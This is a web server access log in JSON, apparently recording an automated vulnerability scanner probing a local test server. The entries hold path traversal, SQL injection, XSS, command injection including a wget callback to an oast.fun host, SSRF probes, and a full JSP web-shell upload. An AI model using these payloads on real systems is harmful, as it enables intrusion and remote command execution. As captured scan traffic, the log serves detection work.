+{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbraAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"{\x22content\x22: \x22include:\x5Cn remote: http://127.0.0.1:9100/test.yml\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x22297MTtbOg89j5n4dbTg3JmDOg85\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x22297MTtbOg89j5n4dbTg3JmDOg85\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://c9v8h88smpv8c1ig07h0tm81x3j8c4dzq.oast.fun&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MTwhT1DCobOiKAn3FT7bAcaQ=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"cache.example.com"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../297MTvjsJ4T8nWw7mXSs4AJEenP.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MTwhT1DCobOiKAn3FT7bAcaQ=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.211","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTvjsJ4T8nWw7mXSs4AJEenP.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://c9v8h8gsmpv8c1qg07h0bqj99w8w8uu9s.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like 